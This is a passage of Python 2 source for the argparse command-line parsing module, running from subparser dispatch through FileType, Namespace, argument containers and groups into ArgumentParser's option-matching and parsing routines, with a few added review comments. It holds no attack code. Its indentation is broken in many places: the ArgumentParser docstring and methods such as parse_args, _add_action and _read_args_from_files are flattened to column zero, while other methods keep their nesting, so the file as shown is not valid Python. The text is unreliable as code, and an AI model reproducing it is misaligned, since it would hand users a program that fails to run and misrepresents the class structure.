            self._choices_actions.append(choice_action)

        # create the parser and add it to the map
        parser = self._parser_class(**kwargs)
        self._name_parser_map[name] = parser
        return parser

    def _get_subactions(self):
        return self._choices_actions

    def __call__(self, parser, namespace, values, option_string=None):
        # First value selects the sub-parser; the rest is its argv.
        parser_name = values[0]
        arg_strings = values[1:]

        # set the parser name if requested
        if self.dest is not SUPPRESS:
            setattr(namespace, self.dest, parser_name)

        # select the parser
        try:
            parser = self._name_parser_map[parser_name]
        except KeyError:
            # NOTE(review): the message is %-formatted *before* being passed
            # to gettext, so translated catalogs will never match; later
            # argparse releases translate first, then format.
            tup = parser_name, ', '.join(self._name_parser_map)
            msg = _('unknown parser %r (choices: %s)' % tup)
            raise ArgumentError(self, msg)

        # parse all the remaining options into the namespace
        # store any unrecognized options on the object, so that the top
        # level parser can decide what to do with them
        namespace, arg_strings = parser.parse_known_args(arg_strings, namespace)
        if arg_strings:
            vars(namespace).setdefault(_UNRECOGNIZED_ARGS_ATTR, [])
            getattr(namespace, _UNRECOGNIZED_ARGS_ATTR).extend(arg_strings)
# ==============
# Type classes
# ==============
class FileType(object):
    """Factory for creating file object types

    Instances of FileType are typically passed as type= arguments to the
    ArgumentParser add_argument() method.

    Keyword Arguments:
        - mode -- A string indicating how the file is to be opened. Accepts the
            same values as the builtin open() function.
        - bufsize -- The file's desired buffer size. Accepts the same values as
            the builtin open() function; None means "use open()'s default".
    """

    def __init__(self, mode='r', bufsize=None):
        self._mode = mode
        self._bufsize = bufsize

    def __call__(self, string):
        """Open *string* and return the file object; '-' maps to stdin/stdout."""
        # the special argument "-" means sys.std{in,out}
        if string == '-':
            if 'r' in self._mode:
                return _sys.stdin
            elif 'w' in self._mode:
                return _sys.stdout
            else:
                msg = _('argument "-" with mode %r' % self._mode)
                raise ValueError(msg)
        # all other arguments are used as file names
        # BUG FIX: compare against None rather than truthiness so an
        # explicit bufsize of 0 (unbuffered) is passed through to open()
        # instead of being silently ignored.
        if self._bufsize is not None:
            return open(string, self._mode, self._bufsize)
        return open(string, self._mode)

    def __repr__(self):
        args = [self._mode, self._bufsize]
        args_str = ', '.join([repr(arg) for arg in args if arg is not None])
        return '%s(%s)' % (type(self).__name__, args_str)
# ===========================
# Optional and Positional Parsing
# ===========================
class Namespace(_AttributeHolder):
    """Simple object for storing attributes.

    Implements equality by attribute names and values, and provides a
    simple string representation.
    """

    def __init__(self, **kwargs):
        for name, value in kwargs.items():
            setattr(self, name, value)

    # Namespaces are mutable attribute bags, hence unhashable.
    __hash__ = None

    def __eq__(self, other):
        return vars(self) == vars(other)

    def __ne__(self, other):
        return not (self == other)

    def __contains__(self, key):
        return key in self.__dict__
class _ActionsContainer(object):
    """Shared base for ArgumentParser and argument groups.

    Holds the registered actions, the 'action'/'type' registries, the
    parser-level defaults and the conflict-handling machinery.
    """
    def __init__(self,
                 description,
                 prefix_chars,
                 argument_default,
                 conflict_handler):
        super(_ActionsContainer, self).__init__()
        self.description = description
        self.argument_default = argument_default
        self.prefix_chars = prefix_chars
        self.conflict_handler = conflict_handler
        # set up registries
        self._registries = {}
        # register actions
        self.register('action', None, _StoreAction)
        self.register('action', 'store', _StoreAction)
        self.register('action', 'store_const', _StoreConstAction)
        self.register('action', 'store_true', _StoreTrueAction)
        self.register('action', 'store_false', _StoreFalseAction)
        self.register('action', 'append', _AppendAction)
        self.register('action', 'append_const', _AppendConstAction)
        self.register('action', 'count', _CountAction)
        self.register('action', 'help', _HelpAction)
        self.register('action', 'version', _VersionAction)
        self.register('action', 'parsers', _SubParsersAction)
        # raise an exception if the conflict handler is invalid
        self._get_handler()
        # action storage
        self._actions = []
        self._option_string_actions = {}
        # groups
        self._action_groups = []
        self._mutually_exclusive_groups = []
        # defaults storage
        self._defaults = {}
        # determines whether an "option" looks like a negative number
        self._negative_number_matcher = _re.compile(r'^-\d+$|^-\d*\.\d+$')
        # whether or not there are any optionals that look like negative
        # numbers -- uses a list so it can be shared and edited
        self._has_negative_number_optionals = []
    # ====================
    # Registration methods
    # ====================
    def register(self, registry_name, value, object):
        """Map *value* to *object* in the named registry (e.g. 'action')."""
        registry = self._registries.setdefault(registry_name, {})
        registry[value] = object
    def _registry_get(self, registry_name, value, default=None):
        # Look up *value* in a registry, falling back to *default*.
        return self._registries[registry_name].get(value, default)
    # ==================================
    # Namespace default accessor methods
    # ==================================
    def set_defaults(self, **kwargs):
        """Set parser-level defaults, overriding existing action defaults."""
        self._defaults.update(kwargs)
        # if these defaults match any existing arguments, replace
        # the previous default on the object with the new one
        for action in self._actions:
            if action.dest in kwargs:
                action.default = kwargs[action.dest]
    def get_default(self, dest):
        """Return the default for *dest*: action default first, then
        parser-level default, then None."""
        for action in self._actions:
            if action.dest == dest and action.default is not None:
                return action.default
        return self._defaults.get(dest, None)
    # =======================
    # Adding argument actions
    # =======================
    def add_argument(self, *args, **kwargs):
        """
        add_argument(dest, ..., name=value, ...)
        add_argument(option_string, option_string, ..., name=value, ...)
        """
        # if no positional args are supplied or only one is supplied and
        # it doesn't look like an option string, parse a positional
        # argument
        chars = self.prefix_chars
        if not args or len(args) == 1 and args[0][0] not in chars:
            if args and 'dest' in kwargs:
                raise ValueError('dest supplied twice for positional argument')
            kwargs = self._get_positional_kwargs(*args, **kwargs)
        # otherwise, we're adding an optional argument
        else:
            kwargs = self._get_optional_kwargs(*args, **kwargs)
        # if no default was supplied, use the parser-level default
        if 'default' not in kwargs:
            dest = kwargs['dest']
            if dest in self._defaults:
                kwargs['default'] = self._defaults[dest]
            elif self.argument_default is not None:
                kwargs['default'] = self.argument_default
        # create the action object, and add it to the parser
        action_class = self._pop_action_class(kwargs)
        if not _callable(action_class):
            raise ValueError('unknown action "%s"' % action_class)
        action = action_class(**kwargs)
        # raise an error if the action type is not callable
        type_func = self._registry_get('type', action.type, action.type)
        if not _callable(type_func):
            raise ValueError('%r is not callable' % type_func)
        return self._add_action(action)
    def add_argument_group(self, *args, **kwargs):
        """Create an _ArgumentGroup, register it and return it."""
        group = _ArgumentGroup(self, *args, **kwargs)
        self._action_groups.append(group)
        return group
    def add_mutually_exclusive_group(self, **kwargs):
        """Create a _MutuallyExclusiveGroup, register it and return it."""
        group = _MutuallyExclusiveGroup(self, **kwargs)
        self._mutually_exclusive_groups.append(group)
        return group
    def _add_action(self, action):
        # Insert *action* into the container's bookkeeping structures.
        # resolve any conflicts
        self._check_conflict(action)
        # add to actions list
        self._actions.append(action)
        action.container = self
        # index the action by any option strings it has
        for option_string in action.option_strings:
            self._option_string_actions[option_string] = action
        # set the flag if any option strings look like negative numbers
        for option_string in action.option_strings:
            if self._negative_number_matcher.match(option_string):
                if not self._has_negative_number_optionals:
                    self._has_negative_number_optionals.append(True)
        # return the created action
        return action
    def _remove_action(self, action):
        # Inverse of _add_action for the shared actions list.
        self._actions.remove(action)
    def _add_container_actions(self, container):
        """Copy *container*'s actions into this one (used for parents=)."""
        # collect groups by titles
        title_group_map = {}
        for group in self._action_groups:
            if group.title in title_group_map:
                msg = _('cannot merge actions - two groups are named %r')
                raise ValueError(msg % (group.title))
            title_group_map[group.title] = group
        # map each action to its group
        group_map = {}
        for group in container._action_groups:
            # if a group with the title exists, use that, otherwise
            # create a new group matching the container's group
            if group.title not in title_group_map:
                title_group_map[group.title] = self.add_argument_group(
                    title=group.title,
                    description=group.description,
                    conflict_handler=group.conflict_handler)
            # map the actions to their new group
            for action in group._group_actions:
                group_map[action] = title_group_map[group.title]
        # add container's mutually exclusive groups
        # NOTE: if add_mutually_exclusive_group ever gains title= and
        # description= then this code will need to be expanded as above
        for group in container._mutually_exclusive_groups:
            mutex_group = self.add_mutually_exclusive_group(
                required=group.required)
            # map the actions to their new mutex group
            for action in group._group_actions:
                group_map[action] = mutex_group
        # add all actions to this container or their group
        for action in container._actions:
            group_map.get(action, self)._add_action(action)
    def _get_positional_kwargs(self, dest, **kwargs):
        # Normalize kwargs for a positional argument (no option strings).
        # make sure required is not specified
        if 'required' in kwargs:
            msg = _("'required' is an invalid argument for positionals")
            raise TypeError(msg)
        # mark positional arguments as required if at least one is
        # always required
        if kwargs.get('nargs') not in [OPTIONAL, ZERO_OR_MORE]:
            kwargs['required'] = True
        if kwargs.get('nargs') == ZERO_OR_MORE and 'default' not in kwargs:
            kwargs['required'] = True
        # return the keyword arguments with no option strings
        return dict(kwargs, dest=dest, option_strings=[])
    def _get_optional_kwargs(self, *args, **kwargs):
        # Normalize kwargs for an optional argument, inferring dest from
        # the first long (or else first short) option string.
        # determine short and long option strings
        option_strings = []
        long_option_strings = []
        for option_string in args:
            # error on strings that don't start with an appropriate prefix
            if not option_string[0] in self.prefix_chars:
                msg = _('invalid option string %r: '
                        'must start with a character %r')
                tup = option_string, self.prefix_chars
                raise ValueError(msg % tup)
            # strings starting with two prefix characters are long options
            option_strings.append(option_string)
            if option_string[0] in self.prefix_chars:
                if len(option_string) > 1:
                    if option_string[1] in self.prefix_chars:
                        long_option_strings.append(option_string)
        # infer destination, '--foo-bar' -> 'foo_bar' and '-x' -> 'x'
        dest = kwargs.pop('dest', None)
        if dest is None:
            if long_option_strings:
                dest_option_string = long_option_strings[0]
            else:
                dest_option_string = option_strings[0]
            dest = dest_option_string.lstrip(self.prefix_chars)
            if not dest:
                msg = _('dest= is required for options like %r')
                raise ValueError(msg % option_string)
            dest = dest.replace('-', '_')
        # return the updated keyword arguments
        return dict(kwargs, dest=dest, option_strings=option_strings)
    def _pop_action_class(self, kwargs, default=None):
        # Remove 'action' from kwargs and resolve it through the registry.
        action = kwargs.pop('action', default)
        return self._registry_get('action', action, action)
    def _get_handler(self):
        # determine function from conflict handler string
        handler_func_name = '_handle_conflict_%s' % self.conflict_handler
        try:
            return getattr(self, handler_func_name)
        except AttributeError:
            msg = _('invalid conflict_resolution value: %r')
            raise ValueError(msg % self.conflict_handler)
    def _check_conflict(self, action):
        # Dispatch any option-string clashes to the conflict handler.
        # find all options that conflict with this option
        confl_optionals = []
        for option_string in action.option_strings:
            if option_string in self._option_string_actions:
                confl_optional = self._option_string_actions[option_string]
                confl_optionals.append((option_string, confl_optional))
        # resolve any conflicts
        if confl_optionals:
            conflict_handler = self._get_handler()
            conflict_handler(action, confl_optionals)
    def _handle_conflict_error(self, action, conflicting_actions):
        # conflict_handler='error': refuse duplicate option strings.
        message = _('conflicting option string(s): %s')
        conflict_string = ', '.join([option_string
                                     for option_string, action
                                     in conflicting_actions])
        raise ArgumentError(action, message % conflict_string)
    def _handle_conflict_resolve(self, action, conflicting_actions):
        # conflict_handler='resolve': the new action wins; strip the
        # clashing option strings from the old actions.
        # remove all conflicting options
        for option_string, action in conflicting_actions:
            # remove the conflicting option
            action.option_strings.remove(option_string)
            self._option_string_actions.pop(option_string, None)
            # if the option now has no option string, remove it from the
            # container holding it
            if not action.option_strings:
                action.container._remove_action(action)
class _ArgumentGroup(_ActionsContainer):
    """A titled group of arguments that shares all of its bookkeeping with
    a parent container, so the grouping affects help output only."""

    def __init__(self, container, title=None, description=None, **kwargs):
        # Inherit any unspecified settings from the parent container.
        kwargs.setdefault('conflict_handler', container.conflict_handler)
        kwargs.setdefault('prefix_chars', container.prefix_chars)
        kwargs.setdefault('argument_default', container.argument_default)
        super(_ArgumentGroup, self).__init__(description=description, **kwargs)
        # group attributes
        self.title = title
        self._group_actions = []
        # Share the mutable state with the parent container so actions
        # added here are visible to the parser as a whole.
        self._registries = container._registries
        self._actions = container._actions
        self._option_string_actions = container._option_string_actions
        self._defaults = container._defaults
        self._has_negative_number_optionals = \
            container._has_negative_number_optionals

    def _add_action(self, action):
        action = super(_ArgumentGroup, self)._add_action(action)
        self._group_actions.append(action)
        return action

    def _remove_action(self, action):
        super(_ArgumentGroup, self)._remove_action(action)
        self._group_actions.remove(action)
class _MutuallyExclusiveGroup(_ArgumentGroup):
    """Group whose member options may not be combined on the command line."""

    def __init__(self, container, required=False):
        super(_MutuallyExclusiveGroup, self).__init__(container)
        self.required = required
        self._container = container

    def _add_action(self, action):
        # A required action can never be mutually exclusive with anything:
        # it would always have to be present.
        if action.required:
            msg = _('mutually exclusive arguments must be optional')
            raise ValueError(msg)
        action = self._container._add_action(action)
        self._group_actions.append(action)
        return action

    def _remove_action(self, action):
        self._container._remove_action(action)
        self._group_actions.remove(action)
class ArgumentParser(_AttributeHolder, _ActionsContainer):
"""Object for parsing command line strings into Python objects.
Keyword Arguments:
- prog -- The name of the program (default: sys.argv[0])
- usage -- A usage message (default: auto-generated from arguments)
- description -- A description of what the program does
- epilog -- Text following the argument descriptions
- parents -- Parsers whose arguments should be copied into this one
- formatter_class -- HelpFormatter class for printing help messages
- prefix_chars -- Characters that prefix optional arguments
- fromfile_prefix_chars -- Characters that prefix files containing
additional arguments
- argument_default -- The default value for all arguments
- conflict_handler -- String indicating how to handle conflicts
- add_help -- Add a -h/-help option
"""
    def __init__(self,
                 prog=None,
                 usage=None,
                 description=None,
                 epilog=None,
                 version=None,
                 parents=[],
                 formatter_class=HelpFormatter,
                 prefix_chars='-',
                 fromfile_prefix_chars=None,
                 argument_default=None,
                 conflict_handler='error',
                 add_help=True):
        # NOTE: parents=[] is a mutable default, but it is only iterated,
        # never mutated, so it is harmless here.
        if version is not None:
            import warnings
            warnings.warn(
                """The "version" argument to ArgumentParser is deprecated. """
                """Please use """
                """"add_argument(..., action='version', version="N", ...)" """
                """instead""", DeprecationWarning)
        superinit = super(ArgumentParser, self).__init__
        superinit(description=description,
                  prefix_chars=prefix_chars,
                  argument_default=argument_default,
                  conflict_handler=conflict_handler)
        # default setting for prog
        if prog is None:
            prog = _os.path.basename(_sys.argv[0])
        self.prog = prog
        self.usage = usage
        self.epilog = epilog
        self.version = version
        self.formatter_class = formatter_class
        self.fromfile_prefix_chars = fromfile_prefix_chars
        self.add_help = add_help
        # The two default display groups every parser has.
        add_group = self.add_argument_group
        self._positionals = add_group(_('positional arguments'))
        self._optionals = add_group(_('optional arguments'))
        self._subparsers = None
        # register types
        def identity(string):
            return string
        self.register('type', None, identity)
        # add help and version arguments if necessary
        # (using explicit default to override global argument_default)
        if '-' in prefix_chars:
            default_prefix = '-'
        else:
            default_prefix = prefix_chars[0]
        if self.add_help:
            self.add_argument(
                default_prefix+'h', default_prefix*2+'help',
                action='help', default=SUPPRESS,
                help=_('show this help message and exit'))
        if self.version:
            self.add_argument(
                default_prefix+'v', default_prefix*2+'version',
                action='version', default=SUPPRESS,
                version=self.version,
                help=_("show program's version number and exit"))
        # add parent arguments and defaults
        for parent in parents:
            self._add_container_actions(parent)
            try:
                defaults = parent._defaults
            except AttributeError:
                pass
            else:
                self._defaults.update(defaults)
# =======================
# Pretty __repr__ methods
# =======================
def _get_kwargs(self):
names = [
'prog',
'usage',
'description',
'version',
'formatter_class',
'conflict_handler',
'add_help',
]
return [(name, getattr(self, name)) for name in names]
# ==================================
# Optional/Positional adding methods
# ==================================
    def add_subparsers(self, **kwargs):
        """Create and return the (single) _SubParsersAction for this parser.

        Only one subparsers action is allowed per parser; a second call
        is reported through self.error().
        """
        if self._subparsers is not None:
            self.error(_('cannot have multiple subparser arguments'))
        # add the parser class to the arguments if it's not present
        kwargs.setdefault('parser_class', type(self))
        if 'title' in kwargs or 'description' in kwargs:
            title = _(kwargs.pop('title', 'subcommands'))
            description = _(kwargs.pop('description', None))
            self._subparsers = self.add_argument_group(title, description)
        else:
            self._subparsers = self._positionals
        # prog defaults to the usage message of this parser, skipping
        # optional arguments and with no "usage:" prefix
        if kwargs.get('prog') is None:
            formatter = self._get_formatter()
            positionals = self._get_positional_actions()
            groups = self._mutually_exclusive_groups
            formatter.add_usage(self.usage, positionals, groups, '')
            kwargs['prog'] = formatter.format_help().strip()
        # create the parsers action and add it to the positionals list
        parsers_class = self._pop_action_class(kwargs, 'parsers')
        action = parsers_class(option_strings=[], **kwargs)
        self._subparsers._add_action(action)
        # return the created parsers action
        return action
def _add_action(self, action):
if action.option_strings:
self._optionals._add_action(action)
else:
self._positionals._add_action(action)
return action
def _get_optional_actions(self):
return [action
for action in self._actions
if action.option_strings]
def _get_positional_actions(self):
return [action
for action in self._actions
if not action.option_strings]
# =====================================
# Command line argument parsing methods
# =====================================
def parse_args(self, args=None, namespace=None):
args, argv = self.parse_known_args(args, namespace)
if argv:
msg = _('unrecognized arguments: %s')
self.error(msg % ' '.join(argv))
return args
    def parse_known_args(self, args=None, namespace=None):
        """Like parse_args(), but returns (namespace, unrecognized_args)
        instead of erroring out on extras."""
        # args default to the system args
        if args is None:
            args = _sys.argv[1:]
        # default Namespace built from parser defaults
        if namespace is None:
            namespace = Namespace()
        # add any action defaults that aren't present
        for action in self._actions:
            if action.dest is not SUPPRESS:
                if not hasattr(namespace, action.dest):
                    if action.default is not SUPPRESS:
                        default = action.default
                        # string defaults are converted with the action's
                        # type function, like command-line values
                        # (basestring: this is Python 2 code)
                        if isinstance(action.default, basestring):
                            default = self._get_value(action, default)
                        setattr(namespace, action.dest, default)
        # add any parser defaults that aren't present
        for dest in self._defaults:
            if not hasattr(namespace, dest):
                setattr(namespace, dest, self._defaults[dest])
        # parse the arguments and exit if there are any errors
        try:
            namespace, args = self._parse_known_args(args, namespace)
            if hasattr(namespace, _UNRECOGNIZED_ARGS_ATTR):
                args.extend(getattr(namespace, _UNRECOGNIZED_ARGS_ATTR))
                delattr(namespace, _UNRECOGNIZED_ARGS_ATTR)
            return namespace, args
        except ArgumentError:
            # sys.exc_info() keeps this compatible with both Python 2
            # and Python 3 exception-capture syntax
            err = _sys.exc_info()[1]
            self.error(str(err))
    def _parse_known_args(self, arg_strings, namespace):
        """Core parsing loop: alternately consume positionals and optionals.

        Returns (namespace, extras) where extras are arg strings that
        did not match any action.
        """
        # replace arg strings that are file references
        if self.fromfile_prefix_chars is not None:
            arg_strings = self._read_args_from_files(arg_strings)
        # map all mutually exclusive arguments to the other arguments
        # they can't occur with
        action_conflicts = {}
        for mutex_group in self._mutually_exclusive_groups:
            group_actions = mutex_group._group_actions
            for i, mutex_action in enumerate(mutex_group._group_actions):
                conflicts = action_conflicts.setdefault(mutex_action, [])
                conflicts.extend(group_actions[:i])
                conflicts.extend(group_actions[i + 1:])
        # find all option indices, and determine the arg_string_pattern
        # which has an 'O' if there is an option at an index,
        # an 'A' if there is an argument, or a '-' if there is a '--'
        option_string_indices = {}
        arg_string_pattern_parts = []
        arg_strings_iter = iter(arg_strings)
        for i, arg_string in enumerate(arg_strings_iter):
            # all args after -- are non-options
            if arg_string == '--':
                arg_string_pattern_parts.append('-')
                for arg_string in arg_strings_iter:
                    arg_string_pattern_parts.append('A')
            # otherwise, add the arg to the arg strings
            # and note the index if it was an option
            else:
                option_tuple = self._parse_optional(arg_string)
                if option_tuple is None:
                    pattern = 'A'
                else:
                    option_string_indices[i] = option_tuple
                    pattern = 'O'
                arg_string_pattern_parts.append(pattern)
        # join the pieces together to form the pattern
        arg_strings_pattern = ''.join(arg_string_pattern_parts)
        # converts arg strings to the appropriate and then takes the action
        seen_actions = set()
        seen_non_default_actions = set()
        def take_action(action, argument_strings, option_string=None):
            # Convert the strings and invoke the action, enforcing
            # mutual-exclusion constraints.
            seen_actions.add(action)
            argument_values = self._get_values(action, argument_strings)
            # error if this argument is not allowed with other previously
            # seen arguments, assuming that actions that use the default
            # value don't really count as "present"
            if argument_values is not action.default:
                seen_non_default_actions.add(action)
                for conflict_action in action_conflicts.get(action, []):
                    if conflict_action in seen_non_default_actions:
                        msg = _('not allowed with argument %s')
                        action_name = _get_action_name(conflict_action)
                        raise ArgumentError(action, msg % action_name)
            # take the action if we didn't receive a SUPPRESS value
            # (e.g. from a default)
            if argument_values is not SUPPRESS:
                action(self, namespace, argument_values, option_string)
        # function to convert arg_strings into an optional action
        def consume_optional(start_index):
            # get the optional identified at this index
            option_tuple = option_string_indices[start_index]
            action, option_string, explicit_arg = option_tuple
            # identify additional optionals in the same arg string
            # (e.g. -xyz is the same as -x -y -z if no args are required)
            match_argument = self._match_argument
            action_tuples = []
            while True:
                # if we found no optional action, skip it
                if action is None:
                    extras.append(arg_strings[start_index])
                    return start_index + 1
                # if there is an explicit argument, try to match the
                # optional's string arguments to only this
                if explicit_arg is not None:
                    arg_count = match_argument(action, 'A')
                    # if the action is a single-dash option and takes no
                    # arguments, try to parse more single-dash options out
                    # of the tail of the option string
                    chars = self.prefix_chars
                    if arg_count == 0 and option_string[1] not in chars:
                        action_tuples.append((action, [], option_string))
                        char = option_string[0]
                        option_string = char + explicit_arg[0]
                        new_explicit_arg = explicit_arg[1:] or None
                        optionals_map = self._option_string_actions
                        if option_string in optionals_map:
                            action = optionals_map[option_string]
                            explicit_arg = new_explicit_arg
                        else:
                            msg = _('ignored explicit argument %r')
                            raise ArgumentError(action, msg % explicit_arg)
                    # if the action expect exactly one argument, we've
                    # successfully matched the option; exit the loop
                    elif arg_count == 1:
                        stop = start_index + 1
                        args = [explicit_arg]
                        action_tuples.append((action, args, option_string))
                        break
                    # error if a double-dash option did not use the
                    # explicit argument
                    else:
                        msg = _('ignored explicit argument %r')
                        raise ArgumentError(action, msg % explicit_arg)
                # if there is no explicit argument, try to match the
                # optional's string arguments with the following strings
                # if successful, exit the loop
                else:
                    start = start_index + 1
                    selected_patterns = arg_strings_pattern[start:]
                    arg_count = match_argument(action, selected_patterns)
                    stop = start + arg_count
                    args = arg_strings[start:stop]
                    action_tuples.append((action, args, option_string))
                    break
            # add the Optional to the list and return the index at which
            # the Optional's string args stopped
            assert action_tuples
            for action, args, option_string in action_tuples:
                take_action(action, args, option_string)
            return stop
        # the list of Positionals left to be parsed; this is modified
        # by consume_positionals()
        positionals = self._get_positional_actions()
        # function to convert arg_strings into positional actions
        def consume_positionals(start_index):
            # match as many Positionals as possible
            match_partial = self._match_arguments_partial
            selected_pattern = arg_strings_pattern[start_index:]
            arg_counts = match_partial(positionals, selected_pattern)
            # slice off the appropriate arg strings for each Positional
            # and add the Positional and its args to the list
            for action, arg_count in zip(positionals, arg_counts):
                args = arg_strings[start_index: start_index + arg_count]
                start_index += arg_count
                take_action(action, args)
            # slice off the Positionals that we just parsed and return the
            # index at which the Positionals' string args stopped
            positionals[:] = positionals[len(arg_counts):]
            return start_index
        # consume Positionals and Optionals alternately, until we have
        # passed the last option string
        extras = []
        start_index = 0
        if option_string_indices:
            max_option_string_index = max(option_string_indices)
        else:
            max_option_string_index = -1
        while start_index <= max_option_string_index:
            # consume any Positionals preceding the next option
            next_option_string_index = min([
                index
                for index in option_string_indices
                if index >= start_index])
            if start_index != next_option_string_index:
                positionals_end_index = consume_positionals(start_index)
                # only try to parse the next optional if we didn't consume
                # the option string during the positionals parsing
                if positionals_end_index > start_index:
                    start_index = positionals_end_index
                    continue
                else:
                    start_index = positionals_end_index
            # if we consumed all the positionals we could and we're not
            # at the index of an option string, there were extra arguments
            if start_index not in option_string_indices:
                strings = arg_strings[start_index:next_option_string_index]
                extras.extend(strings)
                start_index = next_option_string_index
            # consume the next optional and any arguments for it
            start_index = consume_optional(start_index)
        # consume any positionals following the last Optional
        stop_index = consume_positionals(start_index)
        # if we didn't consume all the argument strings, there were extras
        extras.extend(arg_strings[stop_index:])
        # if we didn't use all the Positional objects, there were too few
        # arg strings supplied.
        if positionals:
            self.error(_('too few arguments'))
        # make sure all required actions were present
        for action in self._actions:
            if action.required:
                if action not in seen_actions:
                    name = _get_action_name(action)
                    self.error(_('argument %s is required') % name)
        # make sure all required groups had one option present
        for group in self._mutually_exclusive_groups:
            if group.required:
                for action in group._group_actions:
                    if action in seen_non_default_actions:
                        break
                # if no actions were used, report the error
                else:
                    names = [_get_action_name(action)
                             for action in group._group_actions
                             if action.help is not SUPPRESS]
                    msg = _('one of the arguments %s is required')
                    self.error(msg % ' '.join(names))
        # return the updated namespace and the extra arguments
        return namespace, extras
def _read_args_from_files(self, arg_strings):
# expand arguments referencing files
new_arg_strings = []
for arg_string in arg_strings:
# for regular arguments, just add them back into the list
if arg_string[0] not in self.fromfile_prefix_chars:
new_arg_strings.append(arg_string)
# replace arguments referencing files with the file content
else:
try:
args_file = open(arg_string[1:])
try:
arg_strings = []
for arg_line in args_file.read().splitlines():
for arg in self.convert_arg_line_to_args(arg_line):
arg_strings.append(arg)
arg_strings = self._read_args_from_files(arg_strings)
new_arg_strings.extend(arg_strings)
finally:
args_file.close()
except IOError:
err = _sys.exc_info()[1]
self.error(str(err))
# return the modified argument list
return new_arg_strings
def convert_arg_line_to_args(self, arg_line):
return [arg_line]
def _match_argument(self, action, arg_strings_pattern):
# match the pattern for this action to the arg strings
nargs_pattern = self._get_nargs_pattern(action)
match = _re.match(nargs_pattern, arg_strings_pattern)
# raise an exception if we weren't able to find a match
if match is None:
nargs_errors = {
None: _('expected one argument'),
OPTIONAL: _('expected at most one argument'),
ONE_OR_MORE: _('expected at least one argument'),
}
default = _('expected %s argument(s)') % action.nargs
msg = nargs_errors.get(action.nargs, default)
raise ArgumentError(action, msg)
# return the number of arguments matched
return len(match.group(1))
def _match_arguments_partial(self, actions, arg_strings_pattern):
# progressively shorten the actions list by slicing off the
# final actions until we find a match
result = []
for i in range(len(actions), 0, -1):
actions_slice = actions[:i]
pattern = ''.join([self._get_nargs_pattern(action)
for action in actions_slice])
match = _re.match(pattern, arg_strings_pattern)
if match is not None:
result.extend([len(string) for string in match.groups()])
break
# return the list of arg string counts
return result
    def _parse_optional(self, arg_string):
        """Classify *arg_string*: return None if it is a positional, else a
        (action, option_string, explicit_arg) tuple; action is None when
        the string looks like an option but is unknown here."""
        # if it's an empty string, it was meant to be a positional
        if not arg_string:
            return None
        # if it doesn't start with a prefix, it was meant to be positional
        if not arg_string[0] in self.prefix_chars:
            return None
        # if the option string is present in the parser, return the action
        if arg_string in self._option_string_actions:
            action = self._option_string_actions[arg_string]
            return action, arg_string, None
        # if it's just a single character, it was meant to be positional
        if len(arg_string) == 1:
            return None
        # if the option string before the "=" is present, return the action
        if '=' in arg_string:
            option_string, explicit_arg = arg_string.split('=', 1)
            if option_string in self._option_string_actions:
                action = self._option_string_actions[option_string]
                return action, option_string, explicit_arg
        # search through all possible prefixes of the option string
        # and all actions in the parser for possible interpretations
        option_tuples = self._get_option_tuples(arg_string)
        # if multiple actions match, the option string was ambiguous
        if len(option_tuples) > 1:
            options = ', '.join([option_string
                for action, option_string, explicit_arg in option_tuples])
            tup = arg_string, options
            self.error(_('ambiguous option: %s could match %s') % tup)
        # if exactly one action matched, this segmentation is good,
        # so return the parsed action
        elif len(option_tuples) == 1:
            option_tuple, = option_tuples
            return option_tuple
        # if it was not found as an option, but it looks like a negative
        # number, it was meant to be positional
        # unless there are negative-number-like options
        if self._negative_number_matcher.match(arg_string):
            if not self._has_negative_number_optionals:
                return None
        # if it contains a space, it was meant to be a positional
        if ' ' in arg_string:
            return None
        # it was meant to be an optional but there is no such option
        # in this parser (though it might be a valid option in a subparser)
        return None, arg_string, None
def _get_option_tuples(self, option_string):
    """Collect ``(action, option_string, explicit_arg)`` candidates
    whose registered option strings have *option_string* as an
    abbreviation (prefix match).
    """
    result = []

    # option strings starting with two prefix characters are only
    # split at the '='
    chars = self.prefix_chars
    if option_string[0] in chars and option_string[1] in chars:
        if '=' in option_string:
            option_prefix, explicit_arg = option_string.split('=', 1)
        else:
            option_prefix = option_string
            explicit_arg = None
        # NOTE(review): the loop variable below shadows the
        # *option_string* parameter; harmless only because the
        # parameter was already captured in option_prefix/explicit_arg.
        for option_string in self._option_string_actions:
            if option_string.startswith(option_prefix):
                action = self._option_string_actions[option_string]
                tup = action, option_string, explicit_arg
                result.append(tup)

    # single character options can be concatenated with their arguments
    # but multiple character options always have to have their argument
    # separate
    elif option_string[0] in chars and option_string[1] not in chars:
        option_prefix = option_string
        explicit_arg = None
        short_option_prefix = option_string[:2]
        short_explicit_arg = option_string[2:]

        for option_string in self._option_string_actions:
            if option_string == short_option_prefix:
                action = self._option_string_actions[option_string]
                tup = action, option_string, short_explicit_arg
                result.append(tup)
            elif option_string.startswith(option_prefix):
                action = self._option_string_actions[option_string]
                tup = action, option_string, explicit_arg
                result.append(tup)

    # shouldn't ever get here
    else:
        self.error(_('unexpected option string: %s') % option_string)

    # return the collected option tuples
    return result
def _get_nargs_pattern(self, action):
    """Build the regex fragment used to match this action's arguments.

    The pattern alphabet: 'A' is an argument string, 'O' is an option
    string, and '-' stands for a '--' separator.
    """
    # in all examples below, we have to allow for '--' args
    # which are represented as '-' in the pattern
    nargs = action.nargs

    # the default (None) is assumed to be a single argument
    if nargs is None:
        nargs_pattern = '(-*A-*)'

    # allow zero or one arguments
    elif nargs == OPTIONAL:
        nargs_pattern = '(-*A?-*)'

    # allow zero or more arguments
    elif nargs == ZERO_OR_MORE:
        nargs_pattern = '(-*[A-]*)'

    # allow one or more arguments
    elif nargs == ONE_OR_MORE:
        nargs_pattern = '(-*A[A-]*)'

    # allow any number of options or arguments
    elif nargs == REMAINDER:
        nargs_pattern = '([-AO]*)'

    # allow one argument followed by any number of options or arguments
    elif nargs == PARSER:
        nargs_pattern = '(-*A[-AO]*)'

    # all others should be integers
    else:
        nargs_pattern = '(-*%s-*)' % '-*'.join('A' * nargs)

    # if this is an optional action, -- is not allowed
    if action.option_strings:
        nargs_pattern = nargs_pattern.replace('-*', '')
        nargs_pattern = nargs_pattern.replace('-', '')

    # return the pattern
    return nargs_pattern
# ========================
# Value conversion methods
# ========================
def _get_values(self, action, arg_strings):
    """Convert the matched argument strings for *action* into its
    final value (a single object or a list, depending on nargs) and
    validate the result against ``action.choices``.
    """
    # for everything but PARSER args, strip out '--'
    if action.nargs not in [PARSER, REMAINDER]:
        arg_strings = [s for s in arg_strings if s != '--']

    # optional argument produces a default when not present
    if not arg_strings and action.nargs == OPTIONAL:
        if action.option_strings:
            value = action.const
        else:
            value = action.default
